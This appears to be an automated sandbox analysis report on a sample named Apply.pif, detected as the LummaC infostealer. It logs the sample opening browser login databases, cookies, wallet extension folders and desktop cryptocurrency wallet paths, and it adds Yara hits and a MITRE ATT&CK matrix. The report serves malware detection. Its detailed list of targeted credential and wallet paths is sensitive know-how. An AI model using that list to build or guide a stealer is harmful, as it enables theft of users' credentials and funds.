Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Apply.pif	Binary or memory string: WIN_81
Source: Apply.pif	Binary or memory string: WIN_XP
Source: Apply.pif	Binary or memory string: WIN_XPe
Source: Apply.pif	Binary or memory string: WIN_VISTA
Source: Apply.pif.10.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Apply.pif	Binary or memory string: WIN_7
Source: Apply.pif	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Directory queried: number of queries: 1001

Source: Yara match

File source: Process Memory Space: Apply.pif PID: 6488, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Apply.pif PID: 6488, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008D198B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		12_2_008D198B
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008D1F8D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		12_2_008D1F8D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	31 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
